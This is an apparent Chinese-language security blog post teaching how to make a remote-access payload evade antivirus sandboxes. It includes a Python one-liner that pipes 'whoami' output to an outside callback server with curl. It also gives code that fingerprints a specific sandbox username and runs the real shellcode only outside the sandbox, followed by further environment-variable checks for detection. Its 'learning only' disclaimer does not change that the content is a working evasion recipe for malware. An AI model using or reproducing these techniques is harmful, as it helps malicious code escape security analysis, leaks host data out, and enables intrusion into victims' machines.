申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!
公众号现在只对常读和星标的公众号才展示大图推送,
建议大家把 明暗安全
设为星标,否则可能就看不到啦!
简单地说,反沙箱技术指的是一种可以检测出虚拟环境的运行软件的技术。虚拟环境是指一种用于模拟真实操作系统的软件环境,软件通常会利用虚拟环境来隐藏自己的真实意图。而反沙箱技术通过识别虚拟环境的特征,从而发现并拦截软件的活动,保护我们的远控。
首先启动我们的反连平台
用法在历史文章里,链接如下。
我们用它的作用,是为了接受沙箱运行的反连,用来判断沙箱环境。
2. 制作一个python的exe
关键代码如下:
import os
result = os.system('whoami | curl -X POST -d @- http://ip:8881/')
使用pyinstaller打包为exe,并丢到反沙箱上。
pyinstaller -F ceshi.py
3. 查看反连
发现了一个特征,沙箱的whoami返回值为:
desktop-h9urb7t\administrator
4. 开始编写反沙箱代码。
import subprocess
def get_current_user():
""" 获取当前用户名 """
return subprocess.check_output("whoami").decode().strip()
# 获取当前用户
current_user = get_current_user()
# 检查当前用户是否为 'desktop-h9urb7t\administrator'
if current_user.lower() == r'desktop-h9urb7t\administrator'.lower():
print("当前用户为 desktop-h9urb7t\administrator,脚本不执行。")
else:
print("当前用户不是 desktop-h9urb7t\administrator,可以执行脚本。")
# 在这里添加你想要执行的代码
实际的shellcode
OK,将shellcode替换为自己的免杀。重新丢到沙箱查看。成功bypass沙箱。
原理很简单,就是查看当前运行的环境的whoami值是否为
desktop-h9urb7t\administrator
是就不运行。
思考:
除了whoami,还有其他明显特征吗。
举例:
%USERNAME%
和 %USERDOMAIN%
环境变量可以提供当前用户名和域名。
%COMPUTERNAME%
提供当前计算机的名称。
%OS%
可以告诉你操作系统类型。
%PROCESSOR_ARCHITECTURE%
提供处理器架构信息(例如x64或x86)。
往期精彩推荐
1.本文已收录在明暗官方网站:http://www.php1nf0.top/